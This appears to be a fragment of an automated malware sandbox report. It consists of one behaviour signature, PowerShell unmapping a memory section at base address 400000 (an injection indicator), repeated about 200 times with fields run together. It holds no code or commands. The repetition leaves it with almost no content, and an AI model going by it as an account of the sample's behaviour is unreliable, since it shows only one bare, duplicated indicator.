    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
